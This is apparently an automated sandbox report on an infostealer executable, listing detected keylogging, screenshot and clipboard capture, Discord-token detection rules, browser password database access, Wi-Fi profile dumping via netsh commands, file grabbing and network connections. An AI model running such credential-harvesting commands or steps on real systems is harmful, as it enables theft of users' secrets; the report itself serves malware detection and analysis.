                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.4:49740 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: K6aOw2Jmji.exe, DesktopScreenshot.cs.Net Code: Make
                            Source: K6aOw2Jmji.exe, Keylogger.cs.Net Code: SetHook
                            Source: K6aOw2Jmji.exe, Keylogger.cs.Net Code: KeyboardLayout
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Window created: window name: CLIPBRDWNDCLASS

                            Spam, unwanted Advertisements and Ransom Demands

                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe File deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.pdf
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe File deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\WUTJSCBCFX.jpg
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe File deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe File deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.png
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe File deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.pdf

                            System Summary

                            Source: K6aOw2Jmji.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132
                            Source: K6aOw2Jmji.exe | Static PE information: No import functions for PE file found
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamestub.exe6 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe | Binary or memory string: OriginalFilenamestub.exe6 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: K6aOw2Jmji.exe, Report.cs | Task registration methods: 'CreateTask'
                            Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@19/85@7/5
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | File created: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Mutant created: \Sessions\1\BaseNamedObjects\UIWGELIQBFRB4M6IX13M
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                            Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6400
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA5ED.tmp
                            Source: K6aOw2Jmji.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: K6aOw2Jmji.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: tmpA60D.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: K6aOw2Jmji.exe | ReversingLabs: Detection: 68%
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | File read: C:\Users\user\Desktop\K6aOw2Jmji.exe
                            Source: unknown | Process created: C:\Users\user\Desktop\K6aOw2Jmji.exe "C:\Users\user\Desktop\K6aOw2Jmji.exe"
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr All
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: K6aOw2Jmji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: K6aOw2Jmji.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: K6aOw2Jmji.exeStatic file information: File size 3747840 > 1048576
                            Source: K6aOw2Jmji.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x391a00
                            Source: K6aOw2Jmji.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: K6aOw2Jmji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Data.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Windows.Forms.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdbp source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: !costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Numerics.pdbY9 source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.Numerics.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: K6aOw2Jmji.exe
                            Source: Binary string: System.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.pdb* source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: ntkrnlmp.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.pdbh source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdbRSDSC source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Data.pdbH source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Windows.Forms.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9E50000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2161158898.00000267E9731000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2160038870.00000267E7549000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: winload_prod.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Net.Http.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Drawing.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr

                            Data Obfuscation

                            Source: K6aOw2Jmji.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Source: 0.2.K6aOw2Jmji.exe.267ea190000.6.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                            Source: 0.2.K6aOw2Jmji.exe.267ea190000.6.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                            Source: 0.2.K6aOw2Jmji.exe.26790071be8.1.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                            Source: 0.2.K6aOw2Jmji.exe.26790071be8.1.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                            Source: Yara matchFile source: K6aOw2Jmji.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTR
                            Source: K6aOw2Jmji.exeStatic PE information: 0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B88785E push eax; iretd 0_2_00007FFD9B88786D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8877F3 pushad ; iretd 0_2_00007FFD9B88785D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8876FD pushad ; iretd 0_2_00007FFD9B88785D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Memory allocated: 267E8DC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Memory allocated: 267E8FC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 598153
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 598140
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 598031
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 597920
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 595773
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 595666
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 595540
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Thread delayed: delay time: 595406
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Window / User API: threadDelayed 2800
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe Window / User API: threadDelayed 6983
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -37815825351104557s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -598153s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -598140s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -598031s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -597920s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -200000s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99872s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99765s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99656s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99547s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99422s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99312s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99203s >= -30000s
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exe TID: 6636 Thread sleep time: -99094s >= -30000s
